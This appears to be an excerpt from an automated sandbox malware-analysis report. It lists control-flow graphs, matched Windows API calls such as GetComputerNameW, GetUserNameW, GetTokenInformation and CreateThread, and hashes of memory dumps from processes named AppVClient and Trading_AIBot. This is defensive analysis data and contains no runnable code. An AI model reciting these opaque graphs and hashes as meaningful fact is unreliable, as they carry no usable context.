                                                                                                                                                                                                                                      control_flow_graph 282 b152a0-b153fe 287 b15400-b15424 282->287 288 b50d4c-b50d4e 282->288 290 b1539b 287->290 291 b1542a 287->291 293 b15413-b15419 290->293 294 b1539d-b153a1 290->294 291->290 292 b15430-b1543e 291->292 297 b15441-b1544a 292->297 295 b152b0-b152b5 294->295 296 b153a7 294->296 296->295 298 b153ad 296->298 302 b15450 297->302 303 b153c4-b153ca GetSystemDefaultLangID 297->303 300 b153f3-b153f9 298->300 301 b153af 298->301 312 b15355 300->312 313 b1532a 300->313 304 b153e0-b153f1 301->304 310 b15411 302->310 311 b153c1 302->311 306 b15475-b1547b 303->306 304->293 304->300 306->288 310->293 310->303 311->310 314 b153c3 311->314 317 b152d1-b152e7 312->317 318 b152e8-b15363 312->318 313->312 316 b1532c-b1533f 313->316 319 b1536b-b1536f 316->319 317->318 324 b153d1-b153d5 318->324 325 b15365 318->325 319->297 322 b15375-b15390 319->322 322->314 326 b15392-b1539a 322->326 324->294 327 b153d7 324->327 325->324 328 b15367-b15369 325->328 326->294 327->304 329 b15342-b15345 327->329 328->319 329->287 330 b1534b 329->330 330->287 331 b15351-b15353 330->331 331->312
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 00B153C4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                                                                                      • Instruction ID: 567ab531e36b06aaf6cef039aa4213df7661d0fa140291a587d6d1c06bfb28b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0241B46241DE95CFD73A422468A42F07BE0DB923A2FDD04E7D4E3C71E6D1A85CC1936A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 b30080-b30286 2 b30099-b30575 0->2 3 b3028c 0->3 7 b30155 2->7 8 b3057b 2->8 5 b30445 3->5 5->2 6 b3044b-b30457 5->6 9 b30458-b30472 GetComputerNameW 6->9 11 b302ef-b30495 call b1e050 * 2 7->11 8->7 10 b30581-b30587 8->10 15 b303ee-b303f4 9->15 16 b3024c-b30253 9->16 13 b3058b 10->13 11->9 55 b3043e 11->55 18 b30181 VirtualFree 13->18 19 b3058c-b30591 13->19 37 b300da-b3023f 15->37 38 b303fa 15->38 23 b301e6 16->23 24 b30255 16->24 20 b301a8-b302ac call b47164 18->20 21 b30597 19->21 22 b304ab-b304af 19->22 27 b302b1-b302be 20->27 21->22 30 b3059d 21->30 48 b304c7 22->48 23->27 28 b301ec-b30313 call b4715c 23->28 31 b302d3 24->31 33 b302c4 27->33 34 b303bf-b303d9 GetUserNameW 27->34 52 b30318-b3031e 28->52 30->22 31->23 36 b302d9 31->36 33->34 43 b302ca 33->43 44 b30331 34->44 36->11 37->16 50 b30241-b3024a 37->50 38->37 45 b30400 38->45 43->31 53 b30171 44->53 54 b30337 44->54 51 b3b1ee-b3b49f 45->51 58 b304cc-b304e6 call b49970 GetComputerNameW 48->58 50->16 50->27 56 b30324 52->56 57 b30568-b3056b 52->57 59 b30173 53->59 60 b3013f-b30146 53->60 54->53 61 b3033d 54->61 55->5 56->57 64 b3032a 56->64 57->58 70 b30131 58->70 71 b304ec-b30514 58->71 66 b30230 59->66 60->13 62 b305d0-b305d9 61->62 62->51 64->44 66->48 67 b30236-b305c2 66->67 67->48 74 b305c8-b305c9 67->74 72 b30137 70->72 73 b30089-b3008c 70->73 71->57 72->73 77 b3013d 72->77 73->20 76 b30092 73->76 74->62 76->20 78 b30098 76->78 77->18 77->60 78->2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                                                                                      • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                                                                                      • Instruction ID: a482213db9b2e0bc4c833df859b9567399ecd68b110d06e34e977a844067b0ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11D10531428F0D8BC728FF58D8957EAB7E1FFA0310F28469EE846C3264DA74964587C2

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 79 b18070-b1817e 81 b18180 79->81 82 b1813d-b181a5 79->82 83 b18184 81->83 84 b1815f 81->84 95 b181a7 82->95 96 b181bd-b181ca 82->96 85 b18186 CloseHandle 83->85 86 b1818c-b18192 83->86 84->82 88 b18161 84->88 85->86 89 b18115-b18118 86->89 90 b18194 86->90 92 b18163-b18170 call b47164 88->92 93 b180a7 89->93 94 b18119-b1811a 89->94 90->89 97 b1819a 90->97 92->85 104 b18172 92->104 94->93 99 b1811c 94->99 107 b181d0 96->107 108 b180f3 96->108 100 b1813c 97->100 102 b1820f 99->102 100->83 105 b18215-b1821e 102->105 106 b1808e-b18096 102->106 104->86 105->106 118 b18224 105->118 106->83 106->93 115 b180c3 107->115 116 b181fe-b18201 GetTokenInformation 107->116 109 b180f5 108->109 110 b1808c 108->110 109->110 117 b18077 109->117 110->106 115->116 119 b180c9 115->119 116->102 128 b181b7 116->128 121 b181d7-b181de call b4715c 117->121 118->121 122 b18226 118->122 124 b180ca-b180d8 GetTokenInformation 119->124 130 b181e3-b181e6 121->130 122->121 125 b18228-b182ee call b15d90 122->125 127 b1810f 124->127 149 b182f0 125->149 150 b1830c-b1831e 125->150 134 b18111 127->134 135 b1812d 127->135 128->102 133 b181b9-b181bb 128->133 130->124 143 b18089 130->143 133->96 134->135 136 b18113 134->136 138 b18133 135->138 139 b180a8 135->139 136->89 138->100 142 b181ed-b181f0 138->142 141 b180aa-b180ad 139->141 141->92 145 b180b3-b18203 141->145 146 b181f6 142->146 147 b180da-b180f1 142->147 143->124 148 b1808b 143->148 145->92 158 b18209 145->158 146->147 153 b181fc 146->153 147->141 148->110 149->150 151 b182f2 149->151 154 b182a1-b182ba call b15d90 call b1ec00 150->154 155 b18320 150->155 156 b182f7-b182fc call b15d90 151->156 153->116 154->155 155->156 157 b18322 155->157 168 b18253-b18265 call b31280 156->168 169 b18302 156->169 157->156 162 b18324-b18326 157->162 165 b18328 162->165 172 b18335 165->172 173 b182df-b1832b 165->173 168->165 179 b1826b 168->179 169->168 175 b18308-b1830a 169->175 178 b1826e-b18285 172->178 173->172 180 b1832d-b18331 173->180 175->150 181 b18287 178->181 182 b1829b-b1829d 178->182 179->178 183 b18239 179->183 180->172 184 b1824c 181->184 182->154 183->165 186 b1823f-b18243 183->186 184->182 185 b1824e-b18252 184->185 185->178 186->156 186->184
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                                                                                      • Instruction ID: 6d3d69c43a76cbb79b0be27f1c16ccdbfc1cc12a734981460f18c74c0f171446
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD61473250CA49AFC7668B2898987F57BE1FB5D350FE802DAE446D31A0DF344CD58392

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 187 b15910-b15912 188 b15950-b15968 187->188 189 b15915-b15928 call b49970 187->189 188->189 190 b1596a 188->190 195 b159b8 call b30df0 189->195 192 b15970-b1597b 190->192 193 b1592f 190->193 196 b159d4 192->196 197 b1597d 192->197 193->189 198 b15931-b2072c 193->198 204 b159bd-b159c2 call b15d90 195->204 202 b159d8-b159de 196->202 203 b1593b-b15a15 call b311a0 196->203 197->196 200 b1597f-b15981 197->200 205 b20732-b20738 198->205 206 b20806-b20809 198->206 207 b15983-b15a38 200->207 218 b15994-b1599c 202->218 223 b159e0 202->223 220 b159c7-b159ce 204->220 212 b20800 205->212 213 b2073e 205->213 221 b2079d-b207a6 206->221 207->218 219 b15a3e 207->219 212->206 217 b206b3-b206b7 212->217 213->212 222 b20744-b20774 213->222 217->221 230 b206bd 217->230 228 b15a02 218->228 229 b1599e-b159f7 218->229 224 b15a2c-b15a34 219->224 225 b159d0 220->225 226 b15a1a-b15a26 220->226 231 b20791-b20793 221->231 232 b207a8 221->232 237 b206d5-b206d9 222->237 238 b2077a-b2081c 222->238 223->218 233 b159e2-b159ec 223->233 234 b159d9-b159de call b42190 224->234 225->226 236 b159d2 225->236 226->224 235 b159a1-b159b5 call b15e10 226->235 228->192 229->228 230->221 240 b206c3-b207fe 230->240 241 b207ca-b207cc 231->241 232->231 242 b207aa 232->242 243 b15a62-b15a6e 233->243 244 b159ee-b159ef 233->244 234->218 234->223 235->195 261 b15a08-b15a0b 235->261 236->234 251 b206db 237->251 252 b206df 237->252 238->221 240->212 242->241 245 b15a70 243->245 246 b15a75-b15ab3 call b31280 243->246 244->207 253 b159f1 244->253 245->246 257 b15a72 245->257 275 b15ab5 246->275 276 b15abb-b15af2 246->276 251->252 258 b206dd 251->258 252->221 253->189 257->246 258->252 262 b2c0cc 258->262 261->218 263 b15a0d 261->263 265 b2c0e8-b2c102 262->265 266 b2c0ce-b2c0d0 262->266 271 b15991 263->271 272 b15932 263->272 268 b2c0d2-b2c0df 265->268 269 b2c104 265->269 266->268 279 b2c0e7 268->279 269->268 269->279 271->272 277 b15993 271->277 275->276 280 b15ab7-b15ab9 275->280 281 b15af3 276->281 277->218 280->276 281->281
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                                                                                      • Instruction ID: c86623dd15e431b7f1518f9efa52e135d17aa7f9559817b9a01ef62bbd585fbb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24F10A3171CE58CFC769A71C68816BA77D2EBD9310FA846DED04EC3297DD249C468382

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 332 b15b42-b15b47 call b15d90 334 b15b4c-b15b52 332->334 336 b15c42-b15c62 call b31280 334->336 337 b15b0d 334->337 348 b15c24 336->348 349 b15c68 336->349 337->336 339 b15b13 337->339 341 b15c8f-b15c96 339->341 342 b15c29 341->342 343 b15c98-b15c9a 341->343 346 b15cc2-b15cc9 call b152a0 342->346 347 b15c2f-b15c36 342->347 345 b15c9c 343->345 353 b15bfa 345->353 354 b15d0e-b15d18 345->354 364 b15c69 346->364 365 b15ccb 346->365 347->346 352 b15c3c 347->352 355 b15c14-b15c19 348->355 356 b15c26 348->356 352->332 353->354 358 b15c00 353->358 359 b15d54 354->359 360 b15d1a 354->360 361 b15cc0 355->361 362 b15c20-b15c21 355->362 356->355 363 b15c28 356->363 358->355 370 b15d5f 359->370 369 b15d4b-b15d52 360->369 361->346 362->349 363->342 367 b15b68-b15d75 364->367 368 b15c6f 364->368 365->345 366 b15ccd 365->366 366->345 371 b15ccf-b15cdd 366->371 368->367 373 b15c75 368->373 369->359 374 b15d45-b15d47 369->374 376 b15d65 370->376 375 b15cdf-b15ce4 CreateThread 371->375 373->341 374->370 377 b15d49 374->377 378 b15c01-b15d41 375->378 379 b15cea 375->379 376->376 377->369 377->370 378->369 389 b15d43 378->389 379->378 380 b15cf0-b15cf6 379->380 380->362 382 b15cff-b15d01 380->382 383 b15bb4 382->383 384 b15d07 382->384 388 b15cda-b15cdd 383->388 384->383 387 b15d0d 384->387 388->375 389->359
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                                                                                      • Instruction ID: 3e14b0f22196b1c74b942db9a03c67b504654d692119eaac2bd060765f9568b5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5721AE3020CF45CFCB799F189898BF56AE1EBD5310FE801E68447CF2A6CA249CC49396

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 390 b15b09-b15b3b 394 b15cff-b15d01 390->394 395 b15bb4-b15ce4 CreateThread 394->395 396 b15d07 394->396 400 b15c01-b15d41 395->400 401 b15cea 395->401 396->395 397 b15d0d 396->397 408 b15d43 400->408 409 b15d4b-b15d52 400->409 401->400 402 b15cf0-b15cf6 401->402 402->394 404 b15c20-b15c68 402->404 410 b15d54 408->410 409->410 411 b15d45-b15d47 409->411 413 b15d5f 410->413 412 b15d49 411->412 411->413 412->409 412->413 414 b15d65 413->414 414->414
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                                                                                      • Instruction ID: 91632e0bc15f6996493c619df13a944c8d28e62f1678bc17592af865e9825ece
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E601C07010DF46CFDB755E24AC987FA6BE0EBD1324FE501EB8487CA091DAA449C0A792

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 415 b15b87-b15b99 CreateThread 418 b15cff-b15d01 415->418 419 b15bb4-b15ce4 CreateThread 418->419 420 b15d07 418->420 424 b15c01-b15d41 419->424 425 b15cea 419->425 420->419 421 b15d0d 420->421 432 b15d43 424->432 433 b15d4b-b15d52 424->433 425->424 426 b15cf0-b15cf6 425->426 426->418 428 b15c20-b15c68 426->428 434 b15d54 432->434 433->434 435 b15d45-b15d47 433->435 437 b15d5f 434->437 436 b15d49 435->436 435->437 436->433 436->437 438 b15d65 437->438 438->438
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                                                                                      • Instruction ID: f115bc26a86017fb9e6d2ccb11b381b34155a7f297735a8a4c9f93dd644d4aea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64E08C3060DB48CFDB6A9F249D6036A3AE5EBC8314F5902CFC48ADB1D1DF690D468792

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 439 b1599b-b1599e 440 b159f7 439->440 441 b15a02 440->441 443 b159d4 441->443 444 b1597d 441->444 446 b159d8-b159de 443->446 447 b1593b-b15a15 call b311a0 443->447 444->443 445 b1597f-b15981 444->445 448 b15983-b15a38 445->448 454 b15994-b1599c 446->454 456 b159e0 446->456 448->454 455 b15a3e 448->455 454->441 458 b1599e 454->458 457 b15a2c-b15a34 455->457 456->454 459 b159e2-b159ec 456->459 460 b159d9-b159de call b42190 457->460 458->440 461 b15a62-b15a6e 459->461 462 b159ee-b159ef 459->462 460->454 460->456 463 b15a70 461->463 464 b15a75-b15ab3 call b31280 461->464 462->448 466 b159f1 call b49970 462->466 463->464 468 b15a72 463->468 478 b15ab5 464->478 479 b15abb-b15af2 464->479 475 b159b8 call b30df0 466->475 468->464 480 b159bd-b159c2 call b15d90 475->480 478->479 482 b15ab7-b15ab9 478->482 485 b15af3 479->485 484 b159c7-b159ce 480->484 482->479 486 b159d0 484->486 487 b15a1a-b15a26 484->487 485->485 486->487 489 b159d2 486->489 487->457 488 b159a1-b159b5 call b15e10 487->488 488->475 492 b15a08-b15a0b 488->492 489->460 492->454 493 b15a0d 492->493 495 b15991 493->495 496 b15932 493->496 495->496 497 b15993 495->497 497->454
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                                                                                      • Instruction ID: 9120ffe34ceebeda7ebf540127ecca9a0b95ce4dbac5763fe0392e67e7a47e6c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D301D67056DE84CFD6769B1854912F966D2FBD43A0FE805D6908ACB092C9244EC0A743

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 498 b18090-b18096 499 b18184 498->499 500 b18186 CloseHandle 499->500 501 b1818c-b18192 499->501 500->501 502 b18115-b18118 501->502 503 b18194 501->503 504 b180a7 502->504 505 b18119-b1811a 502->505 503->502 506 b1819a 503->506 505->504 507 b1811c 505->507 508 b1813c 506->508 509 b1820f 507->509 508->499 510 b18215-b1821e 509->510 511 b1808e-b18096 509->511 510->511 513 b18224 510->513 511->499 511->504 514 b181d7-b181e6 call b4715c 513->514 515 b18226 513->515 524 b18089 514->524 525 b180ca-b1810f GetTokenInformation 514->525 515->514 516 b18228-b182ee call b15d90 515->516 529 b182f0 516->529 530 b1830c-b1831e 516->530 524->525 528 b1808b 524->528 534 b18111 525->534 535 b1812d 525->535 542 b1808c 528->542 529->530 531 b182f2 529->531 532 b182a1-b182ba call b15d90 call b1ec00 530->532 533 b18320 530->533 537 b182f7-b182fc call b15d90 531->537 532->533 533->537 538 b18322 533->538 534->535 536 b18113 534->536 539 b18133 535->539 540 b180a8 535->540 536->502 557 b18253-b18265 call b31280 537->557 558 b18302 537->558 538->537 545 b18324-b18326 538->545 539->508 546 b181ed-b181f0 539->546 543 b180aa-b180ad 540->543 542->511 548 b18163-b18170 call b47164 543->548 549 b180b3-b18203 543->549 553 b18328 545->553 550 b181f6 546->550 551 b180da-b180f1 546->551 548->500 574 b18172 548->574 549->548 567 b18209 549->567 550->551 556 b181fc 550->556 551->543 562 b18335 553->562 563 b182df-b1832b 553->563 565 b181fe-b18201 GetTokenInformation 556->565 557->553 575 b1826b 557->575 558->557 566 b18308-b1830a 558->566 573 b1826e-b18285 562->573 563->562 577 b1832d-b18331 563->577 565->509 582 b181b7 565->582 566->530 578 b18287 573->578 579 b1829b-b1829d 573->579 574->501 575->573 581 b18239 575->581 577->562 583 b1824c 578->583 579->532 581->553 586 b1823f-b18243 581->586 582->509 585 b181b9-b181ca 582->585 583->579 584 b1824e-b18252 583->584 584->573 589 b181d0 585->589 590 b180f3 585->590 586->537 586->583 589->565 595 b180c3 589->595 590->542 591 b180f5 590->591 591->542 596 b18077 591->596 595->565 597 b180c9 595->597 596->514 597->525
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                                                                                      • Instruction ID: f60023cfbd6d191ad8989aa80b9ead36d733b0a0263fdaf05cf80be0934b25d3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CC08C63228902F6523A02582C4F0F026C0F30F7A0BEC00CAEC06B0220ED248EF300A7

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 598 b1817f 599 b18184 598->599 600 b18186 CloseHandle 599->600 601 b1818c-b18192 599->601 600->601 602 b18115-b18118 601->602 603 b18194 601->603 604 b180a7 602->604 605 b18119-b1811a 602->605 603->602 606 b1819a 603->606 605->604 607 b1811c 605->607 608 b1813c 606->608 609 b1820f 607->609 608->599 610 b18215-b1821e 609->610 611 b1808e-b18096 609->611 610->611 613 b18224 610->613 611->599 611->604 614 b181d7-b181e6 call b4715c 613->614 615 b18226 613->615 624 b18089 614->624 625 b180ca-b1810f GetTokenInformation 614->625 615->614 616 b18228-b182ee call b15d90 615->616 629 b182f0 616->629 630 b1830c-b1831e 616->630 624->625 628 b1808b 624->628 634 b18111 625->634 635 b1812d 625->635 642 b1808c 628->642 629->630 631 b182f2 629->631 632 b182a1-b182ba call b15d90 call b1ec00 630->632 633 b18320 630->633 637 b182f7-b182fc call b15d90 631->637 632->633 633->637 638 b18322 633->638 634->635 636 b18113 634->636 639 b18133 635->639 640 b180a8 635->640 636->602 657 b18253-b18265 call b31280 637->657 658 b18302 637->658 638->637 645 b18324-b18326 638->645 639->608 646 b181ed-b181f0 639->646 643 b180aa-b180ad 640->643 642->611 648 b18163-b18170 call b47164 643->648 649 b180b3-b18203 643->649 653 b18328 645->653 650 b181f6 646->650 651 b180da-b180f1 646->651 648->600 674 b18172 648->674 649->648 667 b18209 649->667 650->651 656 b181fc 650->656 651->643 662 b18335 653->662 663 b182df-b1832b 653->663 665 b181fe-b18201 GetTokenInformation 656->665 657->653 675 b1826b 657->675 658->657 666 b18308-b1830a 658->666 673 b1826e-b18285 662->673 663->662 677 b1832d-b18331 663->677 665->609 682 b181b7 665->682 666->630 678 b18287 673->678 679 b1829b-b1829d 673->679 674->601 675->673 681 b18239 675->681 677->662 683 b1824c 678->683 679->632 681->653 686 b1823f-b18243 681->686 682->609 685 b181b9-b181ca 682->685 683->679 684 b1824e-b18252 683->684 684->673 689 b181d0 685->689 690 b180f3 685->690 686->637 686->683 689->665 695 b180c3 689->695 690->642 691 b180f5 690->691 691->642 696 b18077 691->696 695->665 697 b180c9 695->697 696->614 697->625
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                                                                                      • Instruction ID: 021b111d36429bed50892296e30bf6594da9118aaf425d03ef74051aecf669e8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2C04C62554505B6513626996C0A4E125D0A71B760B9C4492FC1676260E9544DE241A2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 91d9a9d686af75efa5aac8b0fa10dadefcaf1d985f42583fe1f804f47d19fd24
                                                                                                                                                                                                                                      • Instruction ID: 619f0ccbf94a47dfac3229d15e1af4a0c4b4f41cb2087ae99effa910e4c6aaf7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91d9a9d686af75efa5aac8b0fa10dadefcaf1d985f42583fe1f804f47d19fd24
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F061D174D00219DFDB14EFA4D990AADBBB2FF89300F2085A8D4197B364DB35698ACF50
                                                                                                                                                                                                                                      Memory Dump Source
